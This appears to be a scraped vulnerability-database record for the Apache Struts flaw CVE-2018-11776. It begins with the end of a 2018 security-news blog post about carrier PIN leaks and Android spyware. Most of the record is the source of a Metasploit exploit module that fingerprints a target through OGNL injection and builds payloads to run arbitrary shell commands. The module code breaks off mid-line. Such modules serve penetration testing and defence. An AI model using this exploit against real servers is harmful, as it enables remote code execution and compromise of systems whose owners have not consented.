flaws in partners\u2019 websites, [according to BuzzFeed](<https://www.buzzfeednews.com/article/nicolenguyen/tmobile-att-account-pin-security-flaw-apple>). Apple\u2019s online store exposed the T-Mobile data, while the website of phone insurance company Asurion exposed AT&T\u2019s data. Both companies fixed the flaws after being alerted to them.\n\nAccess to a mobile account PIN could let a hacker \u201ceasily commandeer your phone number and use it to trick the SMS-based authentication designed to verify your identity when you log on to your bank, email provider, or social media accounts,\u201d wrote Nicole Nguyen in BuzzFeed.\n\nMeanwhile, a security researcher was able to [enter a Sprint employee portal](<https://techcrunch.com/2018/08/25/hacker-accessed-sprint-portal-customer-data/>) protected by weak credentials, and said customer data could have been accessed.\n\nMore information:\n\n[Passwords Part of Data Breach, T-Mobile Admits: What to Do Now](<https://www.tomsguide.com/us/tmobile-breach-2018,news-27876.html>) _(Tom\u2019s Guide)_\n\n[Why T-Mobile's Data Breach Should Be a Wake-Up Call](<https://www.fool.com/investing/2018/08/27/why-t-mobiles-data-breach-should-be-a-wake-up-call.aspx>) _(Motley Fool)_\n\n[2 Million T-Mobile Customers Are Hit by a Data Breach](<https://www.consumerreports.org/privacy/2-million-t-mobile-customers-hit-by-data-breach/>) _(Consumer Reports)_\n\n[Security researchers found vulnerabilities at AT&T, T-Mobile, and Sprint that could have exposed customer data](<https://www.theverge.com/2018/8/25/17781906/att-tmobile-sprint-security-vulnerabilities-customer-information>) _(The Verge)_\n\n[T-Mobile, AT&T customer account PINs were exposed by website flaws](<https://www.engadget.com/2018/08/25/t-mobile-att-pin-vulnerability/>) _(Engadget)_\n\n### Android Malware Records Calls, Takes Videos\n\n![](https://blog.qualys.com/wp-content/uploads/2018/08/Android-logo-300x188.png)Malware that infects Android devices and conducts extensive snooping has been discovered bundled in a malicious app that mimics a legitimate one.\n\nCalled Triout, the spyware stealthily can record phone calls, log incoming text messages, take videos, snap photos, collect location data and transmit everything it collects to a command and control center, [according to Bitdefender](<https://www.bitdefender.com/files/News/CaseStudies/study/234/Bitdefender-Whitepaper-Triout-The-Malware-Framework-for-Android-That-Packs-Potent-Spyware-Capabilities.pdf>), which discovered it.\n\n\u201cThe malware was first observed lurking in an app, repackaged to look identical to a legitimate Android app called \u2018Sex Game.\u2019 It was available in the Google Play store starting in 2016, but has since been removed,\u201d a ThreatPost [article](<https://threatpost.com/triout-malware-carries-out-extensive-targeted-android-surveillance/136773/>) reads.\n\nMore information:\n\n[Android 'Triout' spyware records calls, sends photos and text messages to attackers](<https://www.csoonline.com/article/3299700/security/android-triout-spyware-records-calls-sends-photos-and-text-messages-to-attackers.html>) _(CSO)_\n\n[This Android spyware records calls and sends your pictures and location to hackers](<https://www.zdnet.com/article/android-spyware-malware-records-calls-and-sends-your-pictures-to-hackers/>) _(ZDnet)_\n\n[New Android Triout Malware Can Record Phone Calls, Steal Pictures](<https://www.bleepingcomputer.com/news/security/new-android-triout-malware-can-record-phone-calls-steal-pictures/>) _(BleepingComputer)_\n\n### In Other News \u2026\n\n * Cyber thieves [stole](<https://cheddars.com/customer-notification/>) payment card information from Cheddar\u2019s Scratch Kitchen restaurants in 23 U.S. states for two months late last year, potentially affecting [almost 600,000 customers](<https://www.prnewswire.com/news-releases/notice-of-unauthorized-access-to-cheddars-scratch-kitchen-guest-data-300701161.html>).\n * Apple was hacked by a 16-year old Australian boy who told authorities he [dreamed of working](<https://hotforsecurity.bitdefender.com/blog/apple-hacked-by-16-year-old-who-dreamed-of-working-for-firm-20254.html>) at the company.\n * Adobe issued [out-of-band fixes](<https://helpx.adobe.com/security/products/photoshop/apsb18-28.html>) for remote code execution vulnerabilities in Photoshop CC, barely a week after its scheduled monthly set of patches.\n * Spyfone, a company that lets parents and employers monitor mobile devices, left an AWS S3 storage bucket unprotected, [exposing all manner of personal data](<https://motherboard.vice.com/amp/en_us/article/9kmj4v/spyware-company-spyfone-terabytes-data-exposed-online-leak>) from thousands of customers.", "cvss3": {}, "published": "2018-08-27T18:32:33", "type": "qualysblog", "title": "Security News: Hackers Aim Ransomware at Big Cos., as Experts Call for Swift Patching of Struts Bug", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-27T18:32:33", "id": "QUALYSBLOG:5E5409E093DE06FE967B988870D82540", "href": "https://blog.qualys.com/news/2018/08/27/security-news-hackers-aim-ransomware-at-big-cos-as-experts-call-for-swift-patching-of-struts-bug", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2023-06-24T16:57:20", "description": "This module exploits a remote code execution vulnerability in Apache Struts version 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution can be performed via an endpoint that makes use of a redirect action. Note that this exploit is dependant on the version of Tomcat running on the target. Versions of Tomcat starting with 7.0.88 currently don't support payloads larger than ~7.5kb. Windows Meterpreter sessions on Tomcat >=7.0.88 are currently not supported. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk.\n", "cvss3": {}, "published": "2018-08-31T18:48:22", "type": "metasploit", "title": "Apache Struts 2 Namespace Redirect OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2023-01-27T15:58:53", "id": "MSF:EXPLOIT-MULTI-HTTP-STRUTS2_NAMESPACE_OGNL-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/struts2_namespace_ognl/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n\n # Eschewing CmdStager for now, since the use of '\\' and ';' are killing me\n #include Msf::Exploit::CmdStager # https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-command-stagers.html\n\n # NOTE: Debugging code has been stripped, but is available in the commit history: a9e625789175a4c4fdfc7092eedfaf376e4d648e\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache Struts 2 Namespace Redirect OGNL Injection',\n 'Description' => %q{\n This module exploits a remote code execution vulnerability in Apache Struts\n version 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution can be performed\n via an endpoint that makes use of a redirect action.\n\n Note that this exploit is dependant on the version of Tomcat running on\n the target. Versions of Tomcat starting with 7.0.88 currently don't\n support payloads larger than ~7.5kb. Windows Meterpreter sessions on\n Tomcat >=7.0.88 are currently not supported.\n\n Native payloads will be converted to executables and dropped in the\n server's temp dir. If this fails, try a cmd/* payload, which won't\n have to write to the disk.\n },\n 'Author' => [\n 'Man Yue Mo', # Discovery\n 'hook-s3c', # PoC\n 'asoto-r7', # Metasploit module\n 'wvu' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2018-11776'],\n ['URL', 'https://lgtm.com/blog/apache_struts_CVE-2018-11776'],\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-057'],\n ['URL', 'https://github.com/hook-s3c/CVE-2018-11776-Python-PoC'],\n ],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Automatic detection', {\n 'Platform' => %w{ unix windows linux },\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\n },\n ],\n [\n 'Windows', {\n 'Platform' => %w{ windows },\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\n },\n ],\n [\n 'Linux', {\n 'Platform' => %w{ unix linux },\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/generic'}\n },\n ],\n ],\n 'DisclosureDate' => '2018-08-22', # Private disclosure = 2018-04-10\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]),\n OptString.new('ACTION', [ true, 'A valid endpoint that is configured as a redirect action', 'showcase.action' ]),\n OptBool.new('ENABLE_STATIC', [ true, 'Enable \"allowStaticMethodAccess\" before executing OGNL', true ]),\n ]\n )\n register_advanced_options(\n [\n OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ]),\n OptString.new('HEADER', [ true, 'The HTTP header field used to transport the optional payload', \"X-#{rand_text_alpha(4)}\"] ),\n OptString.new('TEMPFILE', [ true, 'The temporary filename written to disk when executing a payload', \"#{rand_text_alpha(8)}\"] ),\n ]\n )\n end\n\n def check\n # METHOD 1: Try to extract the state of hte allowStaticMethodAccess variable\n ognl = \"#_memberAccess['allowStaticMethodAccess']\"\n\n resp = send_struts_request(ognl)\n\n # If vulnerable, the server should return an HTTP 302 (Redirect)\n # and the 'Location' header should contain either 'true' or 'false'\n if resp && resp.headers['Location']\n output = resp.headers['Location']\n vprint_status(\"Redirected to: #{output}\")\n if (output.include? '/true/')\n print_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'\")\n datastore['ENABLE_STATIC'] = false\n CheckCode::Vulnerable\n elsif (output.include? '/false/')\n print_status(\"Target requires enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'true'\")\n datastore['ENABLE_STATIC'] = true\n CheckCode::Vulnerable\n else\n CheckCode::Safe\n end\n elsif resp && resp.code==400\n # METHOD 2: Generate two random numbers, ask the target to add them together.\n # If it does, it's vulnerable.\n a = rand(10000)\n b = rand(10000)\n c = a+b\n\n ognl = \"#{a}+#{b}\"\n\n resp = send_struts_request(ognl)\n\n if resp.headers['Location'].include? c.to_s\n vprint_status(\"Redirected to: #{resp.headers['Location']}\")\n print_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'\")\n datastore['ENABLE_STATIC'] = false\n CheckCode::Vulnerable\n else\n CheckCode::Safe\n end\n elsif resp.nil?\n fail_with(Failure::Unreachable,\"Target did not respond. Please double check RHOSTS and RPORT\")\n end\n end\n\n def exploit\n case payload.arch.first\n when ARCH_CMD\n resp = execute_command(payload.encoded)\n else\n resp = send_payload()\n end\n end\n\n def encode_ognl(ognl)\n # Check and fail if the command contains the follow bad characters:\n # ';' seems to terminates the OGNL statement\n # '/' causes the target to return an HTTP/400 error\n # '\\' causes the target to return an HTTP/400 error (sometimes?)\n # '\\r' ends the GET request prematurely\n # '\\n' ends the GET request prematurely\n\n bad_chars = %w[; \\\\ \\r \\n] # and maybe '/'\n bad_chars.each do |c|\n if ognl.include? c\n print_error(\"Bad OGNL request: #{ognl}\")\n fail_with(Failure::BadConfig, \"OGNL request cannot contain a '#{c}'\")\n end\n end\n\n # The following list of characters *must* be encoded or ORNL will asplode\n encodable_chars = { \"%\": \"%25\", # Always do this one first. :-)\n \" \": \"%20\",\n \"\\\"\":\"%22\",\n \"#\": \"%23\",\n \"'\": \"%27\",\n \"<\": \"%3c\",\n \">\": \"%3e\",\n \"?\": \"%3f\",\n \"^\": \"%5e\",\n \"`\": \"%60\",\n \"{\": \"%7b\",\n \"|\": \"%7c\",\n \"}\": \"%7d\",\n #\"\\/\":\"%2f\", # Don't do this. Just leave it front-slashes in as normal.\n #\";\": \"%3b\", # Doesn't work. Anyone have a cool idea for a workaround?\n #\"\\\\\":\"%5c\", # Doesn't work. Anyone have a cool idea for a workaround?\n #\"\\\\\":\"%5c%5c\", # Doesn't work. Anyone have a cool idea for a workaround?\n }\n\n encodable_chars.each do |k,v|\n #ognl.gsub!(k,v) # TypeError wrong argument type Symbol (expected Regexp)\n ognl.gsub!(\"#{k}\",\"#{v}\")\n end\n return ognl\n end\n\n def send_struts_request(ognl, payload: nil, headers: nil)\n ognl = \"${#{ognl}}\"\n vprint_status(\"Submitted OGNL: #{ognl}\")\n ognl = encode_ognl(ognl)\n\n if headers.nil?\n headers = {'Keep-Alive': 'timeout=5, max=1000'}\n end\n\n if payload\n vprint_status(\"Embedding payload of #{payload.length} bytes\")\n headers[datastore['HEADER']] = payload\n end\n\n # TODO: Consider embedding OGNL in an HTTP header to hide it from the Tomcat logs\n uri = normalize_uri(target_uri.path, \"/#{ognl}/#{datastore['ACTION']}\")\n\n r = send_request_cgi(\n #'encode' => true, # this fails to encode '\\', which is a problem for me\n 'uri' => uri,\n 'method' => datastore['HTTPMethod'],\n 'headers' => headers\n )\n\n if r && r.code == 404\n fail_with(Failure::UnexpectedReply, \"Server returned HTTP 404, please double check TARGETURI and ACTION options\")\n end\n\n return r\n end\n\n def send_profile\n # Use OGNL to extract properties from the Java environment\n\n properties = { 'os.name': nil, # e.g. 'Linux'\n 'os.arch': nil, # e.g. 'amd64'\n 'os.version': nil, # e.g. '4.4.0-112-generic'\n 'user.name': nil, # e.g. 'root'\n #'user.home': nil, # e.g. '/root' (didn't work in testing)\n 'user.language': nil, # e.g. 'en'\n #'java.io.tmpdir': nil, # e.g. '/usr/local/tomcat/temp' (didn't work in testing)\n }\n\n ognl = \"\"\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\n ognl << %Q|('#{rand_text_alpha(2)}')|\n properties.each do |k,v|\n ognl << %Q|+(@java.lang.System@getProperty('#{k}'))+':'|\n end\n ognl = ognl[0...-4]\n\n r = send_struts_request(ognl)\n\n if r.code == 400\n fail_with(Failure::UnexpectedReply, \"Server returned HTTP 400, consider toggling the ENABLE_STATIC option\")\n elsif r.headers['Location']\n # r.headers['Location'] should look like '/bILinux:amd64:4.4.0-112-generic:root:en/help.action'\n # Extract the OGNL output from the Location path, and strip the two random chars\n s = r.headers['Location'].split('/')[1][2..-1]\n\n if s.nil?\n # Since the target didn't respond with an HTTP/400, we know the OGNL code executed.\n # But we didn't get any output, so we can't profile the target. Abort.\n return nil\n end\n\n # Confirm that all fields were returned, and non include extra (:) delimiters\n # If the OGNL fails, we might get a partial result back, in which case, we'll abort.\n if s.count(':') > properties.length\n print_error(\"Failed to profile target. Response from server: #{r.to_s}\")\n fail_with(Failure::UnexpectedReply, \"Target responded with unexpected profiling data\")\n end\n\n # Separate the colon-delimited properties and store in the 'properties' hash\n s = s.split(':')\n i = 0\n properties.each do |k,v|\n properties[k] = s[i]\n i += 1\n end\n\n print_good(\"Target profiled successfully: #{properties[:'os.name']} #{properties[:'os.version']}\" +\n \" #{properties[:'os.arch']}, running as #{properties[:'user.name']}\")\n return properties\n else\n print_error(\"Failed to profile target. Response from server: #{r.to_s}\")\n fail_with(Failure::UnexpectedReply, \"Server did not respond properly to profiling attempt.\")\n end\n end\n\n def profile_os\n # Probe for the target OS and architecture\n begin\n properties = send_profile()\n os = properties[:'os.name'].downcase\n rescue\n vprint_warning(\"Target profiling was unable to determine operating system\")\n os = ''\n os = 'windows' if datastore['PAYLOAD'].downcase.include? 'win'\n os = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux'\n os = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix'\n end\n return os\n end\n\n def execute_command(cmd_input, opts={})\n # Semicolons appear to be a bad character in OGNL. cmdstager doesn't understand that.\n if cmd_input.include? ';'\n print_warning(\"WARNING: Command contains bad characters: semicolons (;).\")\n end\n\n os = profile_os()\n\n if os && ((os.include? 'linux') || (os.include? 'nix'))\n cmd = \"{'sh','-c','#{cmd_input}'}\"\n elsif os && (os.include? 'win')\n cmd = \"{'cmd.exe','/c','#{cmd_input}'}\"\n else\n vprint_error(\"Failed to detect target OS. Attempting to execute command directly\")\n cmd = cmd_input\n end\n\n # The following OGNL will run arbitrary commands on Windows and Linux\n # targets, as well as returning STDOUT and STDERR. In my testing,\n # on Struts2 in Tomcat 7.0.79, commands timed out after 18-19 seconds.\n\n vprint_status(\"Executing: #{cmd}\")\n\n ognl = \"\"\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\n ognl << %Q|(#p=new java.lang.ProcessBuilder(#{cmd})).|\n ognl << %q|(#p.redirectErrorStream(true)).|\n ognl << %q|(#process=#p.start()).|\n ognl << %q|(#r=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())

CVE-2022-26134

Description

Related